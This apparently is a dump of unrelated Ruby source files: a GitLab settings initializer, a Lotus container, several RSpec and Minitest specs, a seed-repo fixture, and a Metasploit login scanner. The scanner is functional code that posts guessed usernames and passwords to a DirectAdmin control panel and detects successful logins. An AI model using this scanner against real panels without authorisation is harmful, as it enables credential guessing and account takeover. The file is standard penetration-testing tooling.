  # but follows the pre-9.0 configuration structure. `6_validations.rb` initializer
  # will validate all storages and throw a relevant error to the user if necessary.
  Settings.repositories.storages['default']['path'] ||= Settings.gitlab['user_home'] + '/repositories/'
end
Settings.repositories.storages.each do |key, storage|
  storage = Settingslogic.new(storage)
  # Expand relative paths
  storage['path'] = Settings.absolute(storage['path'])
  # Set failure defaults
  storage['failure_count_threshold'] ||= 10
  storage['failure_wait_time'] ||= 30
  storage['failure_reset_time'] ||= 1800
  storage['storage_timeout'] ||= 5
  # Coerce possibly-string config values into numbers
  storage['failure_count_threshold'] = storage['failure_count_threshold'].to_i
  storage['failure_wait_time'] = storage['failure_wait_time'].to_i
  storage['failure_reset_time'] = storage['failure_reset_time'].to_i
  # We might want to have a timeout shorter than 1 second.
  storage['storage_timeout'] = storage['storage_timeout'].to_f
  Settings.repositories.storages[key] = storage
end
#
# The repository_downloads_path is used to remove outdated repository
# archives. If someone has it configured incorrectly, pointing it at the
# path where repositories are stored, this can cause a data-integrity
# issue. In that case we reset it to the default
# repository_downloads_path value.
#
repositories_storages = Settings.repositories.storages.values
repository_downloads_path = Settings.gitlab['repository_downloads_path'].to_s.gsub(/\/$/, '')
repository_downloads_full_path = File.expand_path(repository_downloads_path, Settings.gitlab['user_home'])
if repository_downloads_path.blank? || repositories_storages.any? { |rs| [repository_downloads_path, repository_downloads_full_path].include?(rs['path'].gsub(/\/$/, '')) }
  Settings.gitlab['repository_downloads_path'] = File.join(Settings.shared['path'], 'cache/archive')
end
#
# Backup
#
Settings['backup'] ||= Settingslogic.new({})
Settings.backup['keep_time'] ||= 0
# NOTE(review): pg_schema is forced to nil unconditionally (plain `=`),
# unlike the `||=` defaults around it — confirm this is deliberate.
Settings.backup['pg_schema'] = nil
Settings.backup['path'] = Settings.absolute(Settings.backup['path'] || "tmp/backups/")
Settings.backup['archive_permissions'] ||= 0600
Settings.backup['upload'] ||= Settingslogic.new({ 'remote_directory' => nil, 'connection' => nil })
Settings.backup['upload']['multipart_chunk_size'] ||= 104857600
Settings.backup['upload']['encryption'] ||= nil
Settings.backup['upload']['storage_class'] ||= nil
#
# Git
#
Settings['git'] ||= Settingslogic.new({})
Settings.git['max_size'] ||= 20971520 # 20.megabytes
Settings.git['bin_path'] ||= '/usr/bin/git'
Settings.git['timeout'] ||= 10
# Important: keep the satellites.path setting until GitLab 9.0 at
# least. This setting is fed to 'rm -rf' in
# db/migrate/20151023144219_remove_satellites.rb
Settings['satellites'] ||= Settingslogic.new({})
Settings.satellites['path'] = Settings.absolute(Settings.satellites['path'] || "tmp/repo_satellites/")
#
# Extra customization
#
Settings['extra'] ||= Settingslogic.new({})
#
# Rack::Attack settings
#
Settings['rack_attack'] ||= Settingslogic.new({})
Settings.rack_attack['git_basic_auth'] ||= Settingslogic.new({})
Settings.rack_attack.git_basic_auth['enabled'] = true if Settings.rack_attack.git_basic_auth['enabled'].nil?
Settings.rack_attack.git_basic_auth['ip_whitelist'] ||= %w{127.0.0.1}
Settings.rack_attack.git_basic_auth['maxretry'] ||= 10
Settings.rack_attack.git_basic_auth['findtime'] ||= 1.minute
Settings.rack_attack.git_basic_auth['bantime'] ||= 1.hour
#
# Gitaly
#
Settings['gitaly'] ||= Settingslogic.new({})
#
# Webpack settings
#
Settings['webpack'] ||= Settingslogic.new({})
Settings.webpack['dev_server'] ||= Settingslogic.new({})
Settings.webpack.dev_server['enabled'] ||= false
Settings.webpack.dev_server['host'] ||= 'localhost'
Settings.webpack.dev_server['port'] ||= 3808
#
# Monitoring settings
#
Settings['monitoring'] ||= Settingslogic.new({})
Settings.monitoring['ip_whitelist'] ||= ['127.0.0.1/8']
Settings.monitoring['unicorn_sampler_interval'] ||= 10
Settings.monitoring['sidekiq_exporter'] ||= Settingslogic.new({})
Settings.monitoring.sidekiq_exporter['enabled'] ||= false
Settings.monitoring.sidekiq_exporter['address'] ||= 'localhost'
Settings.monitoring.sidekiq_exporter['port'] ||= 3807
#
# Testing settings
#
if Rails.env.test?
  Settings.gitlab['default_projects_limit'] = 42
  Settings.gitlab['default_can_create_group'] = true
  Settings.gitlab['default_can_create_team'] = false
end
# Force a refresh of application settings at startup
ApplicationSetting.expire
| 44.709156 | 245 | 0.717624 |
21cd752f47238cbff973489d917b450bb50bf2a2 | 1,272 | require 'thread'
require 'rack/builder'
require 'lotus/router'
module Lotus
  # Rack container that mounts one or more Lotus applications behind a
  # single Rack endpoint, via a class-level configuration block.
  class Container
    class Router < ::Lotus::Router
      # Instantiates Lotus applications with their mount point as path
      # prefix before delegating to Lotus::Router#mount.
      def mount(app, options)
        app = app.new(path_prefix: options.fetch(:at)) if lotus_app?(app)
        super(app, options)
      end
      private
      def lotus_app?(app)
        app.ancestors.include? Lotus::Application
      end
    end
    # BUGFIX: the previous code called Mutex.new.synchronize, which locks a
    # brand-new mutex on every call and therefore provides no mutual
    # exclusion at all. All callers must contend on this one shared lock.
    LOCK = Mutex.new
    attr_reader :routes
    # Stores the container-wide options and routing block (class state,
    # shared by all instances).
    def self.configure(options = {}, &blk)
      LOCK.synchronize do
        @@options       = options
        @@configuration = blk
      end
    end
    def initialize
      LOCK.synchronize do
        assert_configuration_presence!
        prepare_middleware_stack!
      end
    end
    # Rack entry point.
    def call(env)
      @builder.call(env)
    end
    private
    def assert_configuration_presence!
      unless self.class.class_variable_defined?(:@@configuration)
        raise ArgumentError.new("#{ self.class } doesn't have any application mounted.")
      end
    end
    # Builds the Rack middleware stack: optional static-asset middleware in
    # front of the configured router.
    def prepare_middleware_stack!
      @builder = ::Rack::Builder.new
      @routes  = Router.new(&@@configuration)
      if Lotus.environment.serve_static_assets?
        require 'lotus/static'
        @builder.use Lotus::Static
      end
      @builder.run @routes
    end
  end
end
| 21.2 | 88 | 0.628145 |
acdd585f80cbad25a17ad33761368b7b0ce7b9a9 | 471 | # frozen_string_literal: true
require_relative '../../support/feature_helper'
describe 'Composer Dependencies' do
let(:php_developer) { LicenseFinder::TestingDSL::User.new }
specify 'are shown in reports' do
LicenseFinder::TestingDSL::ComposerProject.create
php_developer.run_license_finder
expect(php_developer).to be_seeing_line 'vlucas/phpdotenv, v3.3.3, "New BSD"'
expect(php_developer).to be_seeing_line 'symfony/debug, v4.2.8, MIT'
end
end
| 31.4 | 81 | 0.762208 |
87d6f875135e38aabaeabf42f5780e3038296749 | 3,940 | require 'metasploit/framework/login_scanner/http'
module Metasploit
  module Framework
    module LoginScanner
      # Login scanner for the DirectAdmin web control panel; inherits the
      # generic HTTP scanner behaviour (host/port/ssl/uri/send_request).
      class DirectAdmin < HTTP
        DEFAULT_PORT  = 443
        PRIVATE_TYPES = [ :password ]

        # Checks if the target is Direct Admin Web Control Panel. The login module should call this.
        #
        # @return [Boolean] TrueClass if target is DAWCP, otherwise FalseClass
        def check_setup
          login_uri = normalize_uri("#{uri}/CMD_LOGIN")
          res = send_request({'uri'=> login_uri})
          if res && res.body.include?('DirectAdmin Login')
            return true
          end

          false
        end

        # Returns the latest sid from DirectAdmin Control Panel
        #
        # @return [String] The PHP Session ID for DirectAdmin Web Control login
        def get_last_sid
          # NOTE(review): the `||= lambda { ... }.call` construct is an
          # awkward `||= begin ... end`; the inner `@last_sid = ...`
          # assignment is then re-assigned by the outer `||=`. Behaviour is
          # correct but the idiom is worth simplifying.
          @last_sid ||= lambda {
            # We don't have a session ID. Well, let's grab one right quick from the login page.
            # This should probably only happen once (initially).
            login_uri = normalize_uri("#{uri}/CMD_LOGIN")
            res = send_request({'uri' => login_uri})

            return '' unless res

            cookies = res.get_cookies
            @last_sid = cookies.scan(/(session=\w+);*/).flatten[0] || ''
          }.call
        end

        # Actually doing the login. Called by #attempt_login
        #
        # @param username [String] The username to try
        # @param password [String] The password to try
        # @return [Hash]
        #   * :status [Metasploit::Model::Login::Status]
        #   * :proof [String] the HTTP response body
        def get_login_state(username, password)
          # Prep the data needed for login
          sid      = get_last_sid
          protocol  = ssl ? 'https' : 'http'
          peer      = "#{host}:#{port}"
          login_uri = normalize_uri("#{uri}/CMD_LOGIN")

          res = send_request({
            'uri' => login_uri,
            'method' => 'POST',
            'cookie' => sid,
            'headers' => {
              'Referer' => "#{protocol}://#{peer}/#{login_uri}"
            },
            'vars_post' => {
              'username' => username,
              'password' => password,
              'referer' => '%2F'
            }
          })

          unless res
            return {:status => Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, :proof => res.to_s}
          end

          # After login, the application should give us a new SID
          cookies = res.get_cookies
          sid = cookies.scan(/(session=\w+);*/).flatten[0] || ''
          @last_sid = sid # Update our SID

          # Success is indicated by a redirect plus a fresh session cookie.
          if res.headers['Location'].to_s.include?('/') && !sid.blank?
            return {:status => Metasploit::Model::Login::Status::SUCCESSFUL, :proof => res.to_s}
          end

          {:status => Metasploit::Model::Login::Status::INCORRECT, :proof => res.to_s}
        end

        # Attempts to login to DirectAdmin Web Control Panel. This is called first.
        #
        # @param credential [Metasploit::Framework::Credential] The credential object
        # @return [Result] A Result object indicating success or failure
        def attempt_login(credential)
          result_opts = {
            credential: credential,
            status: Metasploit::Model::Login::Status::INCORRECT,
            proof: nil,
            host: host,
            port: port,
            protocol: 'tcp',
            service_name: ssl ? 'https' : 'http'
          }

          begin
            result_opts.merge!(get_login_state(credential.public, credential.private))
          rescue ::Rex::ConnectionError => e
            # Something went wrong during login. 'e' knows what's up.
            result_opts.merge!(status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: e.message)
          end

          Result.new(result_opts)
        end
      end
    end
  end
end
| 32.833333 | 109 | 0.551269 |
21a1f28abd6e14d3e2623cc4dc161d8150fbcea1 | 1,335 | # Seed repo:
# fa1b1e6c004a68b7d8763b86455da9e6b23e36d6 Merge branch 'add-files' into 'master'
# eb49186cfa5c4338011f5f590fac11bd66c5c631 Add submodules nested deeper than the root
# 18d9c205d0d22fdf62bc2f899443b83aafbf941f Add executables and links files
# 5937ac0a7beb003549fc5fd26fc247adbce4a52e Add submodule from gitlab.com
# 570e7b2abdd848b95f2f578043fc23bd6f6fd24d Change some files
# 6f6d7e7ed97bb5f0054f2b1df789b39ca89b6ff9 More submodules
# d14d6c0abdd253381df51a723d58691b2ee1ab08 Remove ds_store files
# c1acaa58bbcbc3eafe538cb8274ba387047b69f8 Ignore DS files
# ae73cb07c9eeaf35924a10f713b364d32b2dd34f Binary file added
# 874797c3a73b60d2187ed6e2fcabd289ff75171e Ruby files modified
# 2f63565e7aac07bcdadb654e253078b727143ec4 Modified image
# 33f3729a45c02fc67d00adb1b8bca394b0e761d9 Image added
# 913c66a37b4a45b9769037c55c2d238bd0942d2e Files, encoding and much more
# cfe32cf61b73a0d5e9f13e774abde7ff789b1660 Add submodule
# 6d394385cf567f80a8fd85055db1ab4c5295806f Added contributing guide
# 1a0b36b3cdad1d2ee32457c102a8c0b7056fa863 Initial commit
#
module SeedRepo
  # Fixture metadata describing the "big" commit of the seed repository,
  # used by specs that need a well-known commit to assert against.
  module BigCommit
    # SHA of the commit itself and of its (single) parent.
    ID               = "913c66a37b4a45b9769037c55c2d238bd0942d2e"
    PARENT_ID        = "cfe32cf61b73a0d5e9f13e774abde7ff789b1660"

    # Commit metadata as recorded in the seed repository.
    MESSAGE          = "Files, encoding and much more"
    AUTHOR_FULL_NAME = "Dmitriy Zaporozhets"
    FILES_COUNT      = 2
  end
end
| 47.678571 | 85 | 0.865169 |
1d8f6162b84f1fb87d3327d9b7dfa9cdd3230259 | 3,630 | require File.expand_path('../../../spec_helper', __FILE__)
require File.expand_path('../fixtures/methods', __FILE__)
# Specs for Time#localtime: in-place conversion of the receiver to local
# time and (on 1.9+) to an explicitly supplied UTC offset given as an
# Integer, Rational, "(+|-)HH:MM" String, or an object coercible to those.
describe "Time#localtime" do
  it "converts self to local time, modifying the receiver" do
    # Testing with America/Regina here because it doesn't have DST.
    with_timezone("CST", -6) do
      t = Time.gm(2007, 1, 9, 12, 0, 0)
      t.localtime
      t.should == Time.local(2007, 1, 9, 6, 0, 0)
    end
  end

  it "returns self" do
    t = Time.gm(2007, 1, 9, 12, 0, 0)
    t.localtime.should equal(t)
  end

  # The offset-argument form of #localtime only exists on Ruby >= 1.9.
  ruby_version_is "1.9" do
    it "converts time to the UTC offset specified as an Integer number of seconds" do
      t = Time.gm(2007, 1, 9, 12, 0, 0)
      t.localtime(3630)
      t.should == Time.new(2007, 1, 9, 13, 0, 30, 3630)
      t.utc_offset.should == 3630
    end

    describe "with an argument that responds to #to_int" do
      it "coerces using #to_int" do
        o = mock('integer')
        o.should_receive(:to_int).and_return(3630)
        t = Time.gm(2007, 1, 9, 12, 0, 0)
        t.localtime(o)
        t.should == Time.new(2007, 1, 9, 13, 0, 30, 3630)
        t.utc_offset.should == 3630
      end
    end

    it "returns a Time with a UTC offset of the specified number of Rational seconds" do
      t = Time.gm(2007, 1, 9, 12, 0, 0)
      t.localtime(Rational(7201, 2))
      t.should == Time.new(2007, 1, 9, 13, 0, Rational(1, 2), Rational(7201, 2))
      t.utc_offset.should eql(Rational(7201, 2))
    end

    describe "with an argument that responds to #to_r" do
      it "coerces using #to_r" do
        o = mock('rational')
        o.should_receive(:to_r).and_return(Rational(7201, 2))
        t = Time.gm(2007, 1, 9, 12, 0, 0)
        t.localtime(o)
        t.should == Time.new(2007, 1, 9, 13, 0, Rational(1, 2), Rational(7201, 2))
        t.utc_offset.should eql(Rational(7201, 2))
      end
    end

    it "returns a Time with a UTC offset specified as +HH:MM" do
      t = Time.gm(2007, 1, 9, 12, 0, 0)
      t.localtime("+01:00")
      t.should == Time.new(2007, 1, 9, 13, 0, 0, 3600)
      t.utc_offset.should == 3600
    end

    it "returns a Time with a UTC offset specified as -HH:MM" do
      t = Time.gm(2007, 1, 9, 12, 0, 0)
      t.localtime("-01:00")
      t.should == Time.new(2007, 1, 9, 11, 0, 0, -3600)
      t.utc_offset.should == -3600
    end

    describe "with an argument that responds to #to_str" do
      it "coerces using #to_str" do
        o = mock('string')
        o.should_receive(:to_str).and_return("+01:00")
        t = Time.gm(2007, 1, 9, 12, 0, 0)
        t.localtime(o)
        t.should == Time.new(2007, 1, 9, 13, 0, 0, 3600)
        t.utc_offset.should == 3600
      end
    end

    it "raises ArgumentError if the String argument is not of the form (+|-)HH:MM" do
      t = Time.now
      lambda { t.localtime("3600") }.should raise_error(ArgumentError)
    end

    it "raises ArgumentError if the String argument is not in an ASCII-compatible encoding" do
      t = Time.now
      lambda { t.localtime("-01:00".encode("UTF-16LE")) }.should raise_error(ArgumentError)
    end

    # Valid offsets are strictly inside the open interval (-86400, 86400).
    it "raises ArgumentError if the argument represents a value less than or equal to -86400 seconds" do
      t = Time.new
      t.localtime(-86400 + 1).utc_offset.should == (-86400 + 1)
      lambda { t.localtime(-86400) }.should raise_error(ArgumentError)
    end

    it "raises ArgumentError if the argument represents a value greater than or equal to 86400 seconds" do
      t = Time.new
      t.localtime(86400 - 1).utc_offset.should == (86400 - 1)
      lambda { t.localtime(86400) }.should raise_error(ArgumentError)
    end
  end
end
| 34.903846 | 106 | 0.610193 |
39f8292f398f7a2550c991a429c6dfcef224d6b7 | 2,983 | #-- copyright
# OpenProject is a project management system.
# Copyright (C) 2012-2018 the OpenProject Foundation (OPF)
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License version 3.
#
# OpenProject is a fork of ChiliProject, which is a fork of Redmine. The copyright follows:
# Copyright (C) 2006-2017 Jean-Philippe Lang
# Copyright (C) 2010-2013 the ChiliProject Team
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# See docs/COPYRIGHT.rdoc for more details.
#++
require 'spec_helper'
# Specs for the singleton SystemUser: temporary admin privilege escalation
# (#grant_privileges / #remove_privileges) and running a block of work as
# the system user (#run_given) without leaking state afterwards.
describe SystemUser, type: :model do
  let(:system_user) { User.system }

  describe '#grant_privileges' do
    before do
      # Sanity-check the starting state before escalating.
      expect(system_user.admin).to be_falsey
      expect(system_user.status).to eq(User::STATUSES[:active])
      system_user.grant_privileges
    end

    it 'grant admin rights' do
      expect(system_user.admin).to be_truthy
    end
  end

  describe '#remove_privileges' do
    before do
      system_user.admin = true
      system_user.save
      system_user.remove_privileges
    end

    it 'removes admin rights' do
      expect(system_user.admin).to be_falsey
    end
  end

  describe '#run_given' do
    # A private project with a minimally-privileged member, plus a work
    # package the block below will mutate as the system user.
    let(:project) { FactoryBot.create(:project_with_types, public: false) }
    let(:user) { FactoryBot.build(:user) }
    let(:role) { FactoryBot.create(:role, permissions: [:view_work_packages]) }
    let(:member) {
      FactoryBot.build(:member, project: project,
                                roles: [role],
                                principal: user)
    }
    let(:status) { FactoryBot.create(:status) }
    let(:issue) {
      FactoryBot.build(:work_package, type: project.types.first,
                                      author: user,
                                      project: project,
                                      status: status)
    }

    before do
      issue.save!
      @u = system_user
    end

    it 'runs block with SystemUser' do
      expect(@u.admin?).to be_falsey
      before_user = User.current
      @u.run_given do
        issue.done_ratio = 50
        issue.save
      end
      # The change took effect and was journaled as the system user, while
      # admin state and User.current were restored afterwards.
      expect(issue.done_ratio).to eq(50)
      expect(issue.journals.last.user).to eq(@u)
      expect(@u.admin?).to be_falsey
      expect(User.current).to eq(before_user)
    end
  end
end
| 31.072917 | 91 | 0.658733 |
1a42786beb9751f44b1a50aede27b7e681557713 | 127 | # frozen_string_literal: true
require 'problem_details/document'
require 'problem_details/version'
# Top-level namespace for the problem_details gem (RFC 7807, "Problem
# Details for HTTP APIs"). The implementation lives in the files required
# above; this file only establishes the namespace.
module ProblemDetails
end
| 15.875 | 34 | 0.84252 |
381271e60ef8cec8ea6edf0437da522a4afb250c | 856 | # This migration comes from pwb (originally 20170716075456)
# Creates the pwb_pages table: a slug-addressable page record with
# visibility flags, JSON detail payload, and navigation ordering columns.
class CreatePwbPages < ActiveRecord::Migration[5.0]
  def change
    create_table :pwb_pages do |t|
      # Identity / lookup columns.
      t.string :slug
      t.string :setup_id

      # Visibility and bookkeeping.
      t.boolean :visible, default: false
      t.integer :last_updated_by_user_id
      t.integer :flags, default: 0, index: true, null: false
      t.json :details, default: {}

      # Navigation placement and ordering.
      t.integer :sort_order_top_nav, default: 0
      t.integer :sort_order_footer, default: 0
      t.boolean :show_in_top_nav, default: false, index: true
      t.boolean :show_in_footer, default: false, index: true

      t.timestamps null: false
    end

    # Slugs are the public lookup key for a page, so they must be unique.
    add_index :pwb_pages, :slug, unique: true
  end
end
| 34.24 | 61 | 0.670561 |
1d348ee7cc5cd45c21113b44bd78b5516feee4b4 | 1,652 | require 'spec_helper'
include Arbre::Html

# Specs for StyleHash: a hash-like wrapper over an inline CSS style string
# whose keys are normalized to dash-case on both read and write.
describe StyleHash do
  describe "initializer" do
    it "should be able to be initialized without arguments" do
      hash = StyleHash.new
      expect(hash).to be_empty
    end

    it "should be able to be initialized with a hash" do
      hash = StyleHash.new('one' => 'two')
      expect(hash.to_s).to eql('one: two;')
    end

    it "should be able to be initialized with a string containing a style definition" do
      hash = StyleHash.new('one: two; three:four;')
      expect(hash.to_s).to eql('one: two; three: four;')
    end

    it "should convert to dash-case when initialized with a hash" do
      hash = StyleHash.new('styleOne' => 'two')
      expect(hash.to_s).to eql('style-one: two;')
    end
  end

  describe '#style' do
    it "should be an alias to itself" do
      hash = StyleHash.new('one:two;')
      expect(hash.style).to be(hash)
    end
  end

  describe '[]=' do
    it "should convert the used name to dash-case" do
      hash = StyleHash.new
      # snake_case symbol, dash-case string and camelCase string should all
      # end up as dash-case properties.
      hash[:style_one] = 'one'
      hash[:style_two] = 'two'
      hash['style-three'] = 'three'
      hash['styleFour'] = 'four'
      expect(hash.to_s).to eql('style-one: one; style-two: two; style-three: three; style-four: four;')
    end
  end

  describe '[]' do
    it "should convert the used name to dash-case" do
      hash = StyleHash.new('style-one: one; style-two: two; style-three: three; style-four: four;')
      expect(hash[:style_one]).to eql('one')
      expect(hash[:style_two]).to eql('two')
      expect(hash['style-three']).to eql('three')
      expect(hash['styleFour']).to eql('four')
    end
  end
end
| 28.482759 | 103 | 0.626513 |
e92fe0705f7803f2e808897f00543e0f301292c2 | 1,512 | require File.expand_path(File.dirname(__FILE__) + '/spec_helper')
# Specs for Shippinglogic::FedEx::Error: blank, malformed, authentication
# and otherwise-unexpected API responses must all surface as errors with
# the exact messages asserted below.
describe "FedEx Error" do
  before(:each) do
    setup_fedex_responses
  end

  it "should handle blank response errors" do
    use_fedex_response(:blank)
    lambda { new_fedex.track(:tracking_number => fedex_tracking_number).size }.should raise_error(Shippinglogic::FedEx::Error, "The response from FedEx was blank.")
  end

  it "should pass through malformed errors" do
    use_fedex_response(:malformed, :content_type => "")
    lambda { new_fedex.track(:tracking_number => fedex_tracking_number).size }.should raise_error(Shippinglogic::FedEx::Error, "The response from FedEx was malformed and was not in a valid XML format.")
  end

  it "should pass through authentication errors" do
    use_fedex_response(:failed_authentication)
    # Blank credentials should trip the upstream authentication failure.
    fedex = Shippinglogic::FedEx.new("", "", "", "")
    lambda { fedex.track(:tracking_number => fedex_tracking_number).size }.should raise_error(Shippinglogic::FedEx::Error, "Authentication Failed")
  end

  it "should pass through unexpected errors" do
    use_fedex_response(:unexpected)
    lambda { new_fedex.track(:tracking_number => fedex_tracking_number).size }.should raise_error(Shippinglogic::FedEx::Error, "There was a problem with your fedex request, and " +
      "we couldn't locate a specific error message. This means your response was in an unexpected format. You might try glancing at the raw response " +
      "by using the 'response' method on this error object.")
  end
end
| 48.774194 | 202 | 0.743386 |
e9c6927c852fcb53e05e21c91d3ccb31abcb77de | 687 | cask "font-fira-mono-nerd-font" do
version "2.1.0"
sha256 "f4e966bddbbd85826c72b5d6dfcf3c2857095f2e2819784b5babc2a95a544d38"
url "https://github.com/ryanoasis/nerd-fonts/releases/download/v#{version}/FiraMono.zip"
appcast "https://github.com/ryanoasis/nerd-fonts/releases.atom"
name "FiraMono Nerd Font (Fira)"
homepage "https://github.com/ryanoasis/nerd-fonts"
font "Fira Mono Bold Nerd Font Complete.otf"
font "Fira Mono Medium Nerd Font Complete.otf"
font "Fira Mono Regular Nerd Font Complete.otf"
font "Fira Mono Bold Nerd Font Complete Mono.otf"
font "Fira Mono Medium Nerd Font Complete Mono.otf"
font "Fira Mono Regular Nerd Font Complete Mono.otf"
end
| 40.411765 | 90 | 0.765648 |
08efaaf3ecc5f33ce2e649e928e404115042de19 | 4,688 | module Pod
# Module which provides support for running executables.
#
# In a class it can be used as:
#
# extend Executable
# executable :git
#
# This will create two methods `git` and `git!` both accept a command but
# the later will raise on non successful executions. The methods return the
# output of the command.
#
module Executable
# Creates the methods for the executable with the given name.
#
# @param [Symbol] name
# the name of the executable.
#
# @return [void]
#
def executable(name)
define_method(name) do |*command|
Executable.execute_command(name, Array(command).flatten, false)
end
define_method(name.to_s + '!') do |*command|
Executable.execute_command(name, Array(command).flatten, true)
end
end
# Executes the given command displaying it if in verbose mode.
#
# @param [String] bin
# The binary to use.
#
# @param [Array<#to_s>] command
# The command to send to the binary.
#
# @param [Bool] raise_on_failure
# Whether it should raise if the command fails.
#
# @raise If the executable could not be located.
#
# @raise If the command fails and the `raise_on_failure` is set to true.
#
# @return [String] the output of the command (STDOUT and STDERR).
#
# @todo Find a way to display the live output of the commands.
#
def self.execute_command(executable, command, raise_on_failure)
bin = which(executable)
raise Informative, "Unable to locate the executable `#{executable}`" unless bin
require 'shellwords'
command = command.map(&:to_s)
full_command = "#{bin} #{command.join(' ')}"
if Config.instance.verbose?
UI.message("$ #{full_command}")
stdout, stderr = Indenter.new(STDOUT), Indenter.new(STDERR)
else
stdout, stderr = Indenter.new, Indenter.new
end
status = popen3(bin, command, stdout, stderr)
output = stdout.join + stderr.join
unless status.success?
if raise_on_failure
raise Informative, "#{full_command}\n\n#{output}"
else
UI.message("[!] Failed: #{full_command}".red)
end
end
output
end
# Returns the absolute path to the binary with the given name on the current
# `PATH`, or `nil` if none is found.
#
# @param [String] program
# The name of the program being searched for.
#
# @return [String,Nil] The absolute path to the given program, or `nil` if
# it wasn't found in the current `PATH`.
#
def self.which(program)
program = program.to_s
ENV['PATH'].split(File::PATH_SEPARATOR).each do |path|
bin = File.expand_path(program, path)
if File.file?(bin) && File.executable?(bin)
return bin
end
end
nil
end
private
def self.popen3(bin, command, stdout, stderr)
require 'open3'
Open3.popen3(bin, *command) do |i, o, e, t|
reader(o, stdout)
reader(e, stderr)
i.close
status = t.value
o.flush
e.flush
sleep(0.01)
status
end
end
def self.reader(input, output)
Thread.new do
buf = ''
begin
loop do
buf << input.readpartial(4096)
loop do
string, separator, buf = buf.partition(/[\r\n]/)
if separator.empty?
buf = string
break
end
output << (string << separator)
end
end
rescue EOFError
output << (buf << $/) unless buf.empty?
end
end
end
#-------------------------------------------------------------------------#
# Helper class that allows to write to an {IO} instance taking into account
# the UI indentation level.
#
class Indenter < ::Array
# @return [Fixnum] The indentation level of the UI.
#
attr_accessor :indent
# @return [IO] the {IO} to which the output should be printed.
#
attr_accessor :io
# Init a new Indenter
#
# @param [IO] io @see io
#
def initialize(io = nil)
@io = io
@indent = ' ' * UI.indentation_level
end
# Stores a portion of the output and prints it to the {IO} instance.
#
# @param [String] value
# the output to print.
#
# @return [void]
#
def <<(value)
super
io << "#{ indent }#{ value }" if io
end
end
end
end
| 26.788571 | 85 | 0.555034 |
870addeae32554a4e9df794278a17c003a0251e9 | 1,772 | # encoding: utf-8
require 'spec_helper'
# Specs for Orgs::Members#member?: membership checks against the private
# and public organization member endpoints (HTTP 204 => member, 404 => not)
# plus argument validation.
describe Github::Client::Orgs::Members, '#member?' do
  let(:org) { 'github' }
  let(:member) { 'peter-murach' }
  let(:body) { "" }

  before {
    stub_get(request_path).to_return(:body => body, :status => status,
      :headers => {:content_type => "application/json; charset=utf-8"})
  }

  after { reset_authentication_for(subject) }

  context "when private" do
    let(:request_path) { "/orgs/#{org}/members/#{member}" }

    context "this repo is being watched by the user" do
      let(:status) { 404 }

      # Both org and member arguments are required.
      it { expect { subject.member? }.to raise_error(ArgumentError) }

      it "should fail validation " do
        expect { subject.member? org }.to raise_error(ArgumentError)
      end

      it "should return false if resource not found" do
        membership = subject.member? org, member
        membership.should be_false
      end
    end

    context 'user is member of an organization' do
      let(:status) { 204 }

      it "should return true if resoure found" do
        membership = subject.member? org, member
        membership.should be_true
      end
    end
  end

  context 'when public' do
    # public: true switches the client to the public_members endpoint.
    let(:request_path) { "/orgs/#{org}/public_members/#{member}" }

    context "this repo is being watched by the user" do
      let(:status) { 404 }

      it "should return false if resource not found" do
        public_member = subject.member? org, member, public: true
        public_member.should be_false
      end
    end

    context 'user is member of an organization' do
      let(:status) { 204 }

      it "should return true if resoure found" do
        public_member = subject.member? org, member, public: true
        public_member.should be_true
      end
    end
  end
end # member?
| 26.447761 | 71 | 0.633747 |
1a20db5d08e2eaa32942cbeebec5aa83ac3f2d0a | 599 | require 'helper'
# Smoke tests for Faker::IpsumTime: every generator method should produce
# text matching a loose "digits-plus or latin words" pattern.
class TestIpsumTime < Minitest::Test
  # Shared loose patterns for generated text, sentences and single words.
  TEXT_PATTERN     = /1\+|[ a-z]+/i
  SENTENCE_PATTERN = /1\+|[ a-z]+\./i
  WORD_PATTERN     = /1\+|[a-z]+/i

  def test_paragraph
    assert_match(TEXT_PATTERN, Faker::IpsumTime.paragraph)
  end

  def test_sentence
    assert_match(SENTENCE_PATTERN, Faker::IpsumTime.sentence)
  end

  def test_paragraphs
    assert_match(TEXT_PATTERN, Faker::IpsumTime.paragraphs.join(" "))
  end

  def test_sentences
    assert_match(TEXT_PATTERN, Faker::IpsumTime.sentences.join(" "))
  end

  def test_words
    assert_match(TEXT_PATTERN, Faker::IpsumTime.words.join(" "))
  end

  def test_word
    assert_match(WORD_PATTERN, Faker::IpsumTime.word)
  end
end
| 21.392857 | 70 | 0.657763 |
f7191a14e05c3a01af83ea7ed2289c873952d5bc | 778 | =begin
This file is part of SSID.
SSID is free software: you can redistribute it and/or modify
it under the terms of the GNU Lesser General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
SSID is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public License
along with SSID. If not, see <http://www.gnu.org/licenses/>.
=end
class Announcement < ActiveRecord::Base
attr_accessor :title, :html_content
belongs_to :announceable, polymorphic: true
end
| 35.363636 | 75 | 0.789203 |
5d022d7693f00630238ee833b42769b4aa310fe0 | 6,456 | require_relative "../test_helper"
class EventboxSanitizerTest < Minitest::Test
def test_untaggable_object_intern
eb = Class.new(Eventbox) do
sync_call def go(str)
shared_object(str)
end
end.new
err = assert_raises(Eventbox::InvalidAccess) { eb.go(eb.shared_object("mutable")) }
assert_match(/not taggable/, err.to_s)
end
def test_shared_object_intern
eb = Class.new(Eventbox) do
sync_call def go(obj)
return obj.class, [shared_object([obj])]
end
sync_call def back(obj)
return obj.class, obj[0].class, obj[0][0].class
end
end.new
kl0, res = eb.go("string")
assert_equal String, kl0
assert_equal Array, res.class
assert_equal Eventbox::WrappedObject, res[0].class
kl1, kl2, kl3 = eb.back(res)
assert_equal Array, kl1
assert_equal Array, kl2
assert_equal String, kl3
end
def test_shared_object_extern
eb = Class.new(Eventbox) do
sync_call def go(obj)
